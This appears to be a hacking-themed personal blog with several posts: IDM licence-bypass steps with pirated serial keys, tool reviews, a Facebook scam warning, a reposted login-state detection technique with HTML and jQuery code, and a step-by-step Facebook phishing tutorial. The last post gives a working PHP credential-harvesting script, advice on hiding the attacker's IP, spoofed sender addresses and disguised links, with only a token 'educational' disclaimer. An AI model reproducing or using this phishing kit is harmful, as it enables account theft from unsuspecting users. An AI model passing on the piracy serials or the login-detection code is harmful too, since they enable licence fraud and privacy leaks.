tag

ܔܢܜܔAs a yOuNg bOy, I WaS TaUgHt iN HiGh sChOoL ThAt hAcKiNg wAs cOoL.(๏̯͡๏)
●๋•--kểvíń mítńíćk●๋•

Aug 5, 2012

Simple steps to register idm(all versions) for free without any crack

hello nerds n geeks i have found a simple way to register your IDM(Internet Download Manager) for free without any crack or serial, and the best part is that it works on each versions of idm...






so here are the simple steps which you can follow to accomplish your goal....


Step 1:
First of all...download any version of idm on your pc. after installation it gets activated for only 30 days...so our works starts from here...


Step 2:
Go to start and type run on search bar then hit enter, RUN window will get pop up, paste this "C:\Windows\System32\drivers\etc" location in your run and press enter.


Step 3:
U'll find hosts file on that location..replace that hosts file with this hosts file


Step 4:
now open your idm go to registration->register and enter your simple details
your first name
your last name
your e-mail
serial key(enter any of the below key in it)
RLDGN-OV9WU-5W589-6VZH1 
HUDWE-UO689-6D27B-YM28M 
UK3DV-E0MNW-MLQYX-GENA1 
398ND-QNAGY-CMMZU-ZPI39 
GZLJY-X50S3-0S20D-NFRF9 
W3J5U-8U66N-D0B9M-54SLM 
EC0Q6-QN7UH-5S3JB-YZMEK 
UVQW0-X54FE-QW35Q-SNZF5 
FJJTJ-J0FLF-QCVBK-A287M






Step 5: Press ok and you all done..you have registered successfully for life time.."Kudos"


comment if this post works for you..
enjoy Hacking...:)

May 9, 2012

WirelessKeyView to Recover Your Lost Wireless Network Key

WirelessKeyView is a portable free network utility by NirSoft that recovers your wireless network security key/passwords stored in your computer. The latest version adds a feature that allows you to export these keys into a simple text file and then later on import them into another computer.


Because it’s a portable tool you can just download it from their website and launch it without first installing it. It supports on both 32bit and 64bit of Windows, so make sure you know which edition of windows you are using and pick one that matches.




Select the keys you want to export, and Export Select Items from File menu. It’s worth noting that the keys exported in the text file are not encrypted. So make sure to keep the file in the safe place if you are concern about the security of your network.
If you find the keys that are obsolete from the network adapter that are no longer existed, you can even delete the keys from the tool directly. The key deleted from the tool will also be removed from your computer. Note that only the keys from the inactive network adapter can be deleted.


WirelessKeyView works perfectly in XP and Vista but has a bit of difficulty working flawlessly in Windows 7 due to the new encryption and hashing algorithms used by the Windows Data Protection system. The author has to make a workaround but claims that he will still keep the research and development going. However, I test its 64bit version of this tool on my Windows 7 64-bit system and it has no problem revealing all my wireless network keys I ever inputted.


Hope this post will help you out in recovering your network key...!!

Jan 26, 2012

Android Application Firewall: DroidWall

If you have an Android phone and have installed more than a couple of apps on it, you should be able to relate to the following issue. You find an app which sounds interesting, you attempt to install it, and in the privileges list, it says it requires network access. You wonder to yourself, why on earth would this app need access to the Internet in order to work? You've then got to make a judgement call. You either install the app and hope the privilege isn't abused, or you go without. I recently found an application which removes this problem.



The application is named DroidWall and it requires a rooted Android phone to work. When you open the app, it gives you a list of all the installed applications which have been given network privileges, and it lets you pick and choose which of them are allowed to make outgoing network connections. Not only does it do that, but it lets you specify different preferences for wifi and 3g! Perhaps you have a limited amount of 3g data on your phone contract, and you have an app which you only want to be able to use wifi?

Under the hood, it just uses netfilter/iptables. An application firewall is possible because each Android app runs under its own uid. Iptables has a module named "owner" which lets you specify per-uid rules for outgoing connections. Basically, the app requires network privileges to be installed, it thinks it has them, but when it tries to use them it fails to connect. Apps have to deal with this scenario already anyway; it's not uncommon for an app to try to connect to a server on the Internet and fail due to network problems. An app can't distinguish between a network connectivity problem, and DroidWall blocking it.

Dec 15, 2011

Beware! Facebook Scam "Yeahh!! It happens on Live Television!"


we recently covered about a facebook worm which targeted a whole lot of facebook users. It's really sad to see that these types of scams keep growing and facebook hasn't really been able to successfully give protection to their users from such scams.

A new bloke in the list "Yeahh!! It happens on Live Television!", the most viral one yet, is spreading like a wildfire among facebook users.


The following status on one of my friend's wall bought my attention first towards this scam:




Yeahh!! It happens on Live Television![LINK] 
Lol Checkout this video its very embracing moment for her

The lady is the above screen shot is Marika Fruscio an Italian Model, She had Wardrobe malfunction (Accidental exposure of intimate parts) on a live TV show, which is what the scam refers to.


On clicking the link, Facebook users are directed to the folllowing page:




In order to play the video the user has to click the button "jaa", which appears as an age verification system required in order to watch the video. when you click on "jaa" you are infact clicking on a hidden link which consequently post the same link on each of your contact's wall. Next a survey is prompted which the user needs fill in order to watch the video, thus helping the scammers make tons of money.




While searching related to the scam on the internet, I managed to find the source code of the scam on pastebin, This proves that there is not a single body behind this scam, with the source code available in public, any one could create a website and inject the malicious javascript in to it and start scamming.

One more thing to note is that in most such cases blogspot blogs are being targeted as they are free to create, You can create a blog in less than 5 minutes. If this keeps growing, I believe that blogger will stop giving free blogspot blogs and will maybe switch to a payed system or facebook would just disable blogspot domains from being shared, thus making it difficult for real bloggers to market their blogs.

How To Remove The Scam?
It's fairly easy to remove the scam, all you need to do is to report it to facebook. 



DIGITAL DESTROYER'S: Abusing HTTP Status Codes to Expose Private Inform...

DIGITAL DESTROYER'S: Abusing HTTP Status Codes to Expose Private Inform...: When you visit my website, I can automatically and silently determine if you're logged into Facebook, Twitter, GMail and Digg. There are al...

Abusing HTTP Status Codes to Expose Private Information??

When you visit my website, I can automatically and silently determine if you're logged into Facebook, Twitter, GMail and Digg. There are almost certainly thousands of other sites with this issue too, but I picked a few vulnerable well known ones to get your attention. You may not care that I can tell you're logged into GMail, but would you care if I could tell you're logged into one or more porn or warez sites? Perhaps http://oppressive-regime.example.org/ would like to collect a list of their users who are logged into http://controversial-website.example.com/?

Ignoring the privacy implications for a second, as a website developer, you might like to know if your visitors are logged into GMail; you could use that information to automatically fill the email fields in your forms with "@gmail.com"... Perhaps you might want to make your Facebook "like" buttons more prominent if you can tell your visitor is logged into Facebook at the moment? Here's how I achieve this:


First of all. Lets check if you're logged into GMail right now (not including Google Apps)... (No, you're not logged in).
Now, how did I get that information? Really, really, easily... I generated a hidden image in my HTML similar to this:
<img style="display:none;"
     onload="logged_in_to_gmail()"
     onerror="not_logged_in_to_gmail()"
     src="https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD"
/>

I generated the URL in the "src" attribute by logging into my own GMail account, then going into the general settings and uploading a picture in the "My Picture" section. I then ticked the "Visible to everyone" checkbox, and right clicked the uploaded image to get the image location. Fetching the content at that URL does two different things depending on whether or not you're logged into GMail. If you are logged into GMail, it returns an image. If you're not logged into GMail, it redirects to a HTML page. This is why the img tag in my example above works. "onload" is triggered if an image is returned, but "onerror" is triggered otherwise.


I tested this technique in Firefox, Safari, Chrome, Opera and various versions of Internet Explorer and it worked in them all. I reported it to Google and they described it as "expected behaviour" and ignored it.

At this point, you might be wondering why I have "Status Codes" in the title; the method I use for attacking Facebook, Twitter and Digg is slightly different and works because various URLs provide different HTTP status codes depending on your logged in status. Unfortunately, this attack doesn't seem to work in Internet Explorer or Opera, but does work in Firefox, Chrome and Safari. If you're using a non-IE, non-Opera browser, here are tests for Twitter and Facebook:
Are you logged into Twitter ? (Yes, you are logged in)
Are you logged into Facebook? (Yes, you are logged in)
If you have JavaScript disabled on twitter.com and facebook.com, the above tests wont work. Here is how they work when you have JavaScript enabled:

<script type="text/javascript"
        src="https://twitter.com/account/use_phx?setting=false&amp;format=text"
        onload="not_logged_in_to_twitter()"
        onerror="logged_in_to_twitter()"
        async="async"
></script><br/><br/><script type="text/javascript"
        src="https://www.facebook.com/imike3"
        onload="logged_in_to_facebook()"
        onerror="not_logged_in_to_facebook()"
        async="async"
></script>
In Firefox, Safari and Chrome, the <script/> tags fire onload if a 200 HTTP status code is returned, even if there was no valid JavaScript and the Content-Type was text/html. But if the status code was one of 404, 403, 406 or 500, then onerror is triggered instead. In the above examples, the Twitter URL returns an error code if you're logged in, but redirects to the login form with a success status code if you're not logged in. The Facebook one works because my profile is only visible to people who are logged in and returns a 404 if you're not. There is a similar problem with Digg. http://digg.com/settings returns a 403 status code if you're not logged in, but a 200 if you are.


This can be an awkward problem to avoid if you're developing a website. Some of these requests could be stopped by doing referrer checks; reject all external referrers for content only accessible when logged in. You want your status codes and responses to image requests to be relevant, but that can leak information. Firefox users could defend from this problem by using the Request Policy addon. I've never used it myself because it looks like a pain to manage, but it sounds like it would do the job.

And finally, this isn't just an issue of detecting whether or not a user is logged in. The question could technically be anything, if a HTTP response results in an image or html depending on the answer, or results in a success/error status code depending on the answer.

For the web developers out there who are familiar with jQuery, as a demonstration of the usefulness of this technique. The following chunk of code will detect if a user is logged into GMail, and if they are will replace all the mailto: links on your webpage with links to the GMail compose window (automatically filling in the To field):


$('<img/>').hide()
   .attr('src','https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD')
   .load(function(){
      $('a[href^="mailto:"]').each(function(){
         var email = $(this).attr('href').replace(/^mailto:/,'');
         $(this).attr('href','https://mail.google.com/mail/?view=cm&fs=1&tf=0&to='+escape(email));
      });
   })
   .appendTo('body');


Dec 13, 2011

How to H4CK FACEBOOk ACCOUNT ??




How to Hack Facebook Account Using Phising webPage





Everyone eager to hack the facebook account of others.  Here is the simplest method using phishing webpage ,you can hack the facebook account of your friends .










Phishing WebPage:
     Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.


Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.


Step2:
Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:





The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html


Step 3:
Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:
php Script
<php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


save this file as "next.php"


Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.




Step 5:
 create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com


Step 6 :


Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
 Mark it and push the Add hyperlink button
*Updated*  
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.  









Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. 




Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.


Don't use this method for hacking others account. This article is for educational purpose only. Here is tips to prevent from Phishing Web page:
How to prevent from Phishing Web page?